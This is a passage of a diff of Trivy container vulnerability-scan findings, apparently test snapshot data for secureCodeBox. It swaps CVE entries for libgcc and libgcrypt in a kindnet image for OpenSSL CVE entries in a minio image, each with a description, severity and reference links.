"1:8.3.0-6", - "packageName": "libgcc1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", - ], - }, - "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "1:8.3.0-6", - "packageName": "libgcc1", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-15847", + "value": "https://security.netapp.com/advisory/ntap-20220715-0011/", }, { "type": "URL", - "value": "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", + "value": "https://security.netapp.com/advisory/ntap-20230420-0008/", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-15847.html", + "value": "https://ubuntu.com/security/notices/USN-5502-1", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1864.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-2097", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", + "value": "https://www.debian.org/security/2023/dsa-5343", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-15847", + "value": "https://www.openssl.org/news/secadv/20220705.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-33560", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4304", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - "https://access.redhat.com/security/cve/CVE-2021-33560", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", - "https://dev.gnupg.org/T5305", - "https://dev.gnupg.org/T5328", - "https://dev.gnupg.org/T5466", - "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2021-4409.html", - "https://linux.oracle.com/cve/CVE-2021-33560.html", - "https://linux.oracle.com/errata/ELSA-2022-9263.html", - "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-33560", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2022-4304", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "https://linux.oracle.com/cve/CVE-2022-4304.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "https://www.openssl.org/news/secadv/20230207.txt", ], }, "category": "Vulnerability", - "description": "Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "libgcrypt: mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm", + "name": "timing attack in RSA Decryption implementation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-33560", - }, - { - "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-33560.json", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-33560", + "value": "https://avd.aquasec.com/nvd/cve-2022-4304", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33560", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5305", + "value": "https://access.redhat.com/security/cve/CVE-2022-4304", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5328", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://dev.gnupg.org/T5466", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCe8b7f10be275bcedb5fc05ed4837a89bfd605c61", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4409.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-33560.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9263.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/06/msg00021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BKKTOIGFW2SGN3DO2UHHVZ7MJSYN4AAB/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R7OAPCUGPF3VLA7QAJUQSL255D4ITVTL/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-33560", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-13627", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", - "http://www.openwall.com/lists/oss-security/2019/10/02/2", - "https://access.redhat.com/security/cve/CVE-2019-13627", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", - "https://dev.gnupg.org/T4683", - "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", - "https://linux.oracle.com/cve/CVE-2019-13627.html", - "https://linux.oracle.com/errata/ELSA-2020-4482.html", - "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", - "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", - "https://minerva.crocs.fi.muni.cz/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", - "https://security-tracker.debian.org/tracker/CVE-2019-13627", - "https://security.gentoo.org/glsa/202003-32", - "https://ubuntu.com/security/notices/USN-4236-1", - "https://ubuntu.com/security/notices/USN-4236-2", - "https://ubuntu.com/security/notices/USN-4236-3", - "https://usn.ubuntu.com/4236-1/", - "https://usn.ubuntu.com/4236-2/", - "https://usn.ubuntu.com/4236-3/", - "https://www.cve.org/CVERecord?id=CVE-2019-13627", - ], - }, - "category": "Vulnerability", - "description": "It was discovered that there was a ECDSA timing attack in the libgcrypt20 cryptographic library. Version affected: 1.8.4-5, 1.7.6-2+deb9u3, and 1.6.3-2+deb8u4. Versions fixed: 1.8.5-2 and 1.6.3-2+deb8u7.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libgcrypt: ECDSA timing attack allowing private key leak", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-13627", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-09/msg00060.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00018.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2019/10/02/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-13627", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13627", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://dev.gnupg.org/T4683", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://github.com/gpg/libgcrypt/releases/tag/libgcrypt-1.8.5", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-13627.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4482.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2019/09/msg00024.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/01/msg00001.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://minerva.crocs.fi.muni.cz/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-13627", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-13627", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202003-32", + "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-1", + "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-2", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4236-3", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-1/", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-2/", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4236-3/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-13627", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.8.4-5+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-40528", - "installedVersion": "1.8.4-5", - "packageName": "libgcrypt20", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0465", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/errata/RHSA-2022:5311", - "https://access.redhat.com/security/cve/CVE-2021-40528", - "https://bugzilla.redhat.com/2002816", - "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", - "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", - "https://eprint.iacr.org/2021/923", - "https://errata.almalinux.org/8/ALSA-2022-5311.html", - "https://errata.rockylinux.org/RLSA-2022:5311", - "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", - "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", - "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", - "https://linux.oracle.com/cve/CVE-2021-40528.html", - "https://linux.oracle.com/errata/ELSA-2022-9564.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", - "https://security.gentoo.org/glsa/202210-13", - "https://ubuntu.com/security/notices/USN-5080-1", - "https://ubuntu.com/security/notices/USN-5080-2", - "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "https://access.redhat.com/security/cve/CVE-2023-0465", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", ], }, "category": "Vulnerability", - "description": "The ElGamal implementation in Libgcrypt before 1.9.4 allows plaintext recovery because, during interaction between two cryptographic libraries, a certain dangerous combination of the prime defined by the receiver's public key, the generator defined by the receiver's public key, and the sender's ephemeral exponents can lead to a cross-configuration attack against OpenPGP.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": +"Applications that use a non-default option when verifying certificates may be +vulnerable to an attack from a malicious CA to circumvent certain checks. + +Invalid certificate policies in leaf certificates are silently ignored by +OpenSSL and other certificate policy checks are skipped for that certificate. +A malicious CA could use this to deliberately assert invalid certificate policies +in order to circumvent policy checking on the certificate altogether. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ElGamal implementation allows plaintext recovery", + "name": "Invalid certificate policies in leaf certificates are silently ignored", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-40528", + "value": "https://avd.aquasec.com/nvd/cve-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:5311", + "value": "https://access.redhat.com/security/cve/CVE-2023-0465", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-40528", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2002816", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2002816", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40528", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", }, { "type": "URL", - "value": "https://dev.gnupg.org/rCb118681ebc4c9ea4b9da79b0f9541405a64f4c13", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", }, { "type": "URL", - "value": "https://eprint.iacr.org/2021/923", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2022-5311.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5311", + "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", }, { "type": "URL", - "value": "https://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=commit;h=3462280f2e23e16adf3ed5176e0f2413d8861320", + "value": "https://ubuntu.com/security/notices/USN-6039-1", }, { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/07/20/insecurity-elgamal-pt1", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", }, { "type": "URL", - "value": "https://ibm.github.io/system-security-research-updates/2021/09/06/insecurity-elgamal-pt2", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-40528.html", + "value": "https://www.openssl.org/news/secadv/20230328.txt", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0466", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0466", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "https://security.netapp.com/advisory/ntap-20230414-0001/", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230328.txt", + ], + }, + "category": "Vulnerability", + "description": +"The function X509_VERIFY_PARAM_add0_policy() is documented to +implicitly enable the certificate policy check when doing certificate +verification. However the implementation of the function does not +enable the check which allows certificates with invalid or incorrect +policies to pass the certificate verification. + +As suddenly enabling the policy check could break existing deployments it was +decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() +function. + +Instead the applications that require OpenSSL to perform certificate +policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly +enable the policy check by calling X509_VERIFY_PARAM_set_flags() with +the X509_V_FLAG_POLICY_CHECK flag argument. + +Certificate policy checks are disabled by default in OpenSSL and are not +commonly used by applications." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Certificate policy check not enabled", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9564.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-0466", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-40528", + "value": "https://access.redhat.com/security/cve/CVE-2023-0466", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-13", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5080-2", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-40528", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 